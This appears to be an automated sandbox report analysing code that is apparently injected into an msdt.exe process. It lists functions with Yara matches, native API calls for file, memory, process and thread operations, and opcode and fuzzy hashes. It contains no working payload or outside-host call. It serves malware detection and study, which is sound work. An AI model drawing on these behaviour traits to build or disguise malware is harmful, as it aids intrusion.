                Function 0192FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                Download Yara Rule
                C-Code - Quality: 53%
                			E0192FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E018DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01925720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01925720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                0x0192fdda
                0x0192fde2
                0x0192fde5
                0x0192fdec
                0x0192fdfa
                0x0192fdff
                0x0192fe0a
                0x0192fe0f
                0x0192fe17
                0x0192fe1e
                0x0192fe19
                0x0192fe19
                0x0192fe19
                0x0192fe20
                0x0192fe21
                0x0192fe22
                0x0192fe25
                0x0192fe40

                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0192FDFA
                Strings
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0192FE01
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0192FE2B
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                • API String ID: 885266447-3903918235
                • Opcode ID: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                • Instruction ID: 369415b27afc16e7d6872bb818ceb05f4d4aba4e702e6cd65eacb19685f711be
                • Opcode Fuzzy Hash: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                • Instruction Fuzzy Hash: 5EF0C272240211BBEA212A45DC02E73BB6AEB84B30F150218F628961D5DA62B920D7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: msdt.exe PID: 1972 Parent PID: 3440 msdt.exeCOMMON

                Executed Functions

                Function 00E485D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                Download Yara Rule
                APIs
                • NtCreateFile.NTDLL(00000060,00000000,.z`,00E43BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E43BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00E4861D
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID: .z`
                • API String ID: 823142352-1441809116
                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                • Instruction ID: 598b12c5a8eb2a25b571348eea47fd7958f70076e262bd85b25fc5c8e6362ed9
                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                • Instruction Fuzzy Hash: B5F0B6B2201108ABCB08CF88DC85DEB77EDAF8C754F158248BA0D97241C630F811CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E48680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                Download Yara Rule
                APIs
                • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 00E486C5
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: !:
                • API String ID: 2738559852-3508929463
                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                • Instruction ID: 85384e813e033d7cca201986ae1e708c49752ed2f2f88cd68bd52243c2055429
                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                • Instruction Fuzzy Hash: 7DF0A9B2200108ABCB14DF89DC85DEB77ADAF8C754F158248BE1DA7241D630E811CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E486FB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23nativeCOMMON
                Download Yara Rule
                APIs
                • NtClose.NTDLL(@=,?,?,00E43D40,00000000,FFFFFFFF), ref: 00E48725
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Close
                • String ID: @=
                • API String ID: 3535843008-3903022579
                • Opcode ID: 61182b11db2d7552614c58ca564ddd2d696feec7f905b6039e2ae723062ea69f
                • Instruction ID: 0b5e9c752ebafb3c39902b6b482e746ed1620a868fee78d40ea79a741586cfad
                • Opcode Fuzzy Hash: 61182b11db2d7552614c58ca564ddd2d696feec7f905b6039e2ae723062ea69f
                • Instruction Fuzzy Hash: 3EE086366001146BD710DBA9DC45EDBBB58DF94250F154159FA5DE7242C170A50086E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E48700, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                Download Yara Rule
                APIs
                • NtClose.NTDLL(@=,?,?,00E43D40,00000000,FFFFFFFF), ref: 00E48725
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Close
                • String ID: @=
                • API String ID: 3535843008-3903022579
                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                • Instruction ID: 05518512dcb5260cc45ee6b3878bf917af602c4f536a89fd77eab75f83d1ef57
                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                • Instruction Fuzzy Hash: 31D01776200218ABD714EB98DC89EA77BACEF48760F154599BA58AB242C570FA0086E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E487AA, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                Download Yara Rule
                APIs
                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00E32D11,00002000,00003000,00000004), ref: 00E487E9
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: 01916af0e9a45fd77855f74bde9be3ebc2cff63e1be6a2fffa5b937ed38355cc
                • Instruction ID: 7597d2399068e03e2b5e6a0aaffcdf3d1bc1c5160d949a33f7743eed5779bb53
                • Opcode Fuzzy Hash: 01916af0e9a45fd77855f74bde9be3ebc2cff63e1be6a2fffa5b937ed38355cc
                • Instruction Fuzzy Hash: 62F058B1200208AFCB14DF98DC91EE777A8AF8C710F158148FE48AB341C630E811CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E487B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                Download Yara Rule
                APIs
                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00E32D11,00002000,00003000,00000004), ref: 00E487E9
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                • Instruction ID: a5780e5f04c1df3eb0e3fca84d71d741c1f6553200882c56f55496816e8ed347
                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                • Instruction Fuzzy Hash: E0F01CB1200208ABCB14DF89DC81EA777ADAF88750F118148BE08A7241C630F810CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 8a38a3c2d5a28c1a54ff7f45754b823841d070909846f286e4de960be2f9296c
                • Instruction ID: 6b25fa7830fee6fd39e4878a760f60eff454eadb0913811af90f27dd9e16c644
                • Opcode Fuzzy Hash: 8a38a3c2d5a28c1a54ff7f45754b823841d070909846f286e4de960be2f9296c
                • Instruction Fuzzy Hash: 54900265711004030105A55A0754647006697D5391391C022F1005550CDB6188616162
                Uniqueness

                Uniqueness Score: -1.00%

                Function 054595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 2498d521ed525e8ab95c27793be25ffa3c14a010ebf440aa6c983bf85fe8f11a
                • Instruction ID: d3ebf8c433446eb33e79962d68f929fd3ed2d5b15071757cb4c5ae42241162d0
                • Opcode Fuzzy Hash: 2498d521ed525e8ab95c27793be25ffa3c14a010ebf440aa6c983bf85fe8f11a
                • Instruction Fuzzy Hash: 919002A1702004034105715A4464756402A97E0241B91C022E1004590DCA6588917166
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: cbf47a9814421083680ef4e7d8db2a14114669e4e891f84e3afe25d3ef3976f3
                • Instruction ID: 19b4e7f3ab2a1e9ec2d7999b8316cb0574933d8dfeb28b76143fb5397c80dee0
                • Opcode Fuzzy Hash: cbf47a9814421083680ef4e7d8db2a14114669e4e891f84e3afe25d3ef3976f3
                • Instruction Fuzzy Hash: 3F90027170100802D100659A5458786002597E0341F91D012A5014555ECBA588917172
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 5e4bbbecfe15b392b3fe18dbbebbb24b9702068ee089e018179d4c72541d76e3
                • Instruction ID: 09e3fcf95b6407dadd5ffd428f3cf2d1da99f214ab77d755a3211f48ef24f857
                • Opcode Fuzzy Hash: 5e4bbbecfe15b392b3fe18dbbebbb24b9702068ee089e018179d4c72541d76e3
                • Instruction Fuzzy Hash: A690027171114802D110615A8454746002597D1241F91C412A0814558D8BD588917163
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1ab351e0395552d9ee9e79954a3609167e2fda33c56b6a245f2c1a1fa9749988
                • Instruction ID: 252965e65cbe3a757cf83a59f797845c8d815b9112942c0593a519a2c11b3a9c
                • Opcode Fuzzy Hash: 1ab351e0395552d9ee9e79954a3609167e2fda33c56b6a245f2c1a1fa9749988
                • Instruction Fuzzy Hash: 2190026971300402D180715A545874A002597D1242FD1D416A0005558CCE5588696362
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: c2af70ce37eb20067017d7fdf9b432cd2b33563a7e7559a7272031a024aba170
                • Instruction ID: ae3d7c3d15c5e2b77b24a71a293b6b47ebeb1e6f3c9a1878d9c22e25b4c6784a
                • Opcode Fuzzy Hash: c2af70ce37eb20067017d7fdf9b432cd2b33563a7e7559a7272031a024aba170
                • Instruction Fuzzy Hash: 8E90027170504C42D140715A4454B86003597D0345F91C012A0054694D9B658D55B6A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 8bb027dd51c8525c9259da73ff3622ab8363534ffca3e2a317df65a67c0e826b
                • Instruction ID: 4f1b7fa6630763382fb38a0631ec86cf9a0532843b1ecd0a80e9abe799fb8de9
                • Opcode Fuzzy Hash: 8bb027dd51c8525c9259da73ff3622ab8363534ffca3e2a317df65a67c0e826b
                • Instruction Fuzzy Hash: D090027170100C02D180715A445478A002597D1341FD1C016A0015654DCF558A5977E2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 054596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 767af8a92495bd4847b80af4d0556fddd2514e1e6eb336ed7ae803d6a70bb9c2
                • Instruction ID: 50484ed4fad482652bfa6d494a1512a9a5cd8c50cdf7978b260edd7070f4740c
                • Opcode Fuzzy Hash: 767af8a92495bd4847b80af4d0556fddd2514e1e6eb336ed7ae803d6a70bb9c2
                • Instruction Fuzzy Hash: A490027170100C42D100615A4454B86002597E0341F91C017A0114654D8B55C8517562
                Uniqueness

                Uniqueness Score: -1.00%

                Function 054596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 823888ecc26ab912aa6ad1b7544b098daf5a82226f3de741814422971b0f3025
                • Instruction ID: 00bc800183e422e7977309f85011d751ee92fb85bedf0836a12caccef7228d7a
                • Opcode Fuzzy Hash: 823888ecc26ab912aa6ad1b7544b098daf5a82226f3de741814422971b0f3025
                • Instruction Fuzzy Hash: 8D90027170108C02D110615A845478A002597D0341F95C412A4414658D8BD588917162
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 762b43fce521eb64c4f7dc81c669177613a338347857778442477182620e0ca0
                • Instruction ID: 51931c36bc82c2565680d553e041c78a89d18e66194e1a443470f2d7b392392d
                • Opcode Fuzzy Hash: 762b43fce521eb64c4f7dc81c669177613a338347857778442477182620e0ca0
                • Instruction Fuzzy Hash: 8A9002B170100802D140715A4454786002597D0341F91C012A5054554E8B998DD576A6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 054599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 16438201e0361c4138f7ab04d75afc728b342904a6ed0fbc8dfc9b8d56f7a21c
                • Instruction ID: 75698af99379944c04010f1436312e0cf676b478a057fc2b5c883a916389af49
                • Opcode Fuzzy Hash: 16438201e0361c4138f7ab04d75afc728b342904a6ed0fbc8dfc9b8d56f7a21c
                • Instruction Fuzzy Hash: 1C9002A174100842D100615A4464B460025D7E1341F91C016E1054554D8B59CC527167
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: f02cec2019961cac8f34818bb5e95e117c3c34cb8036302d13b9b2803b078ae8
                • Instruction ID: 6ba4e2a55c02fef34db4d5d3fd33492647885a595173c2a3c781c190822efa09
                • Opcode Fuzzy Hash: f02cec2019961cac8f34818bb5e95e117c3c34cb8036302d13b9b2803b078ae8
                • Instruction Fuzzy Hash: E6900261742045525545B15A44546474026A7E02817D1C013A1404950C8A669856E662
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b1f99af6ca91b138c2932fad43552b66966c52c21c3dfad164092bcf4944d5da
                • Instruction ID: ec587d13ba5d8736999f7d49f550bdce62bacc455d759563aeed39d20198931e
                • Opcode Fuzzy Hash: b1f99af6ca91b138c2932fad43552b66966c52c21c3dfad164092bcf4944d5da
                • Instruction Fuzzy Hash: B590027170100813D111615A4554747002997D0281FD1C413A0414558D9B968952B162
                Uniqueness

                Uniqueness Score: -1.00%

                Function 05459A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp Download File
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp Download File
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 2ce47891272b6507badb4028829be27019bf8c2236cbb029af3a08ccb9fce16a
                • Instruction ID: 5015a4bef8fb7198709c14147e40418787ca02df0f7d4ad977929fe3a9387a64
                • Opcode Fuzzy Hash: 2ce47891272b6507badb4028829be27019bf8c2236cbb029af3a08ccb9fce16a
                • Instruction Fuzzy Hash: 5390026171180442D200656A4C64B47002597D0343F91C116A0144554CCE5588616562
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E472F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(000007D0), ref: 00E47398
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: 84056b423c5b0bf5d1a81b45eadff41674d6777954e907abe7e15438b6e8a5c0
                • Instruction ID: 9240a239c7d9ea54a0403c5ca2f19a057b0b2c70e5d67fa3a07478bb2bd63746
                • Opcode Fuzzy Hash: 84056b423c5b0bf5d1a81b45eadff41674d6777954e907abe7e15438b6e8a5c0
                • Instruction Fuzzy Hash: AE31B0B6602700ABC711DF64D8A1FABB7F8EF48700F00851DFA5AAB241D730A805CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E472E6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(000007D0), ref: 00E47398
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: 90572802cee8b01c70ec1edd6504c423d26dd7dfd137ce6ed864172b27c70b79
                • Instruction ID: a5ddcdaba763530dcc64efb6191dba5302a0ec538afc4ac7fe8058cd8703e03c
                • Opcode Fuzzy Hash: 90572802cee8b01c70ec1edd6504c423d26dd7dfd137ce6ed864172b27c70b79
                • Instruction Fuzzy Hash: BC21D2B6641305ABC710EF64D8A1FABB7F4FF48704F048529FA59AB241D770A805CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E488D2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                Download Yara Rule
                APIs
                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E33B93), ref: 00E4890D
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID: .z`
                • API String ID: 3298025750-1441809116
                • Opcode ID: aab04feede0c81369f86af95e0fe16e15b2963dea8764cdab06d4164d709b9c3
                • Instruction ID: e86bdb84227d50c1f43e62cf23f53f59ed03112972d09c66143902cbaccbd7ec
                • Opcode Fuzzy Hash: aab04feede0c81369f86af95e0fe16e15b2963dea8764cdab06d4164d709b9c3
                • Instruction Fuzzy Hash: B0E06DB1600205AFDB18DF94DC4AE9BB7ACEF44750F114658FD08AB251D631E914CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E488E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                Download Yara Rule
                APIs
                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E33B93), ref: 00E4890D
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID: .z`
                • API String ID: 3298025750-1441809116
                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                • Instruction ID: 6af18c4e93360f1780f01d6d12945cc63e6f2266093f21f2c67a47a239456707
                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                • Instruction Fuzzy Hash: 4CE04FB12002086BD718DF59DC49EA777ACEF88750F014554FD0867342C630F910CAF0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E488A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(&5,?,00E43C9F,00E43C9F,?,00E43526,?,?,?,?,?,00000000,00000000,?), ref: 00E488CD
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: &5
                • API String ID: 1279760036-996528113
                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                • Instruction ID: b5d5e89ef03c7779c936d8896b3de5b44c315372c9d1c03bfc95be7893b15841
                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                • Instruction Fuzzy Hash: 5FE012B1200208ABDB18EF99DC45EA777ACAF88650F118558BE086B242C630F910CAB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E37305, Relevance: 3.2, APIs: 2, Instructions: 198threadwindowCOMMON
                Download Yara Rule
                APIs
                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E372DA
                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E372FB
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: 115f433525a59ed3e67852031b53c2c34b79eea133e21c9938ae9c0c3efb8620
                • Instruction ID: f0485b39c59618823883a06d686d9b43c977a84dbaf640e434992739e205dee6
                • Opcode Fuzzy Hash: 115f433525a59ed3e67852031b53c2c34b79eea133e21c9938ae9c0c3efb8620
                • Instruction Fuzzy Hash: 846192B1900309AFDB24DF64DC8AFEB77E8EB45304F10546DF949A7241DB70AA01CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E489E5, Relevance: 3.1, APIs: 2, Instructions: 76processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E489A4
                • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E3CFB2,00E3CFB2,?,00000000,?,?), ref: 00E48A70
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateInternalLookupPrivilegeProcessValue
                • String ID:
                • API String ID: 65721159-0
                • Opcode ID: 0ce576a1dee061463efae5c90dc6431ad26301351cdeec3c9960568de656caad
                • Instruction ID: 0ce0ce604edfe849b803bb1f09449547c3e9d6e89dfb61955d04cc818d624c3e
                • Opcode Fuzzy Hash: 0ce576a1dee061463efae5c90dc6431ad26301351cdeec3c9960568de656caad
                • Instruction Fuzzy Hash: 0F211DB5200209AFDB14DF99DC84EEB77ADAF88750F158259FA4C97241D630E815CBB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00E37280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                Download Yara Rule
                APIs
                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E372DA
